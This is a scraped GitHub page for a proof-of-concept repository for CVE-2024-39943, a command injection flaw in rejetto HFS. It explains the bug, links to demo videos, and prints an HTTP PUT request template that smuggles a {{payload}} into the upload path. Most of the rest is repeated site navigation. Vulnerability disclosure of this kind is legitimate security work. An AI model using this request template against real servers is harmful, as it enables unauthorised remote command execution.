CVE-2024-39943-Poc

CVE-2024-39943 rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).

Deploy: ./hfs --config config.yaml

Poc: user admin

poc.mp4

Poc: user guest

poc_rce3.mp4

update 6/7/2024: Poc user guest

poc_rce2.mp4

PUT /tmp/{{payload}}/poc11.txt HTTP/1.1
Host: <host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Connection: close
Cookie: {{Cookie}}
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

aaaaaaaaaaa

Name		Name	Last commit message	Last commit date
Latest commit History 24 Commits
README.md		README.md
config.yaml		config.yaml
hfs-linux.zip		hfs-linux.zip
poc_user_admin.py		poc_user_admin.py
poc_user_guest.py		poc_user_guest.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2024-39943-Poc

Poc: user admin

Poc: user guest

update 6/7/2024: Poc user guest

About

Releases

Packages

Languages

truonghuuphuc/CVE-2024-39943-Poc

Folders and files

Latest commit

History

Repository files navigation

CVE-2024-39943-Poc

Poc: user admin

Poc: user guest

update 6/7/2024: Poc user guest

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages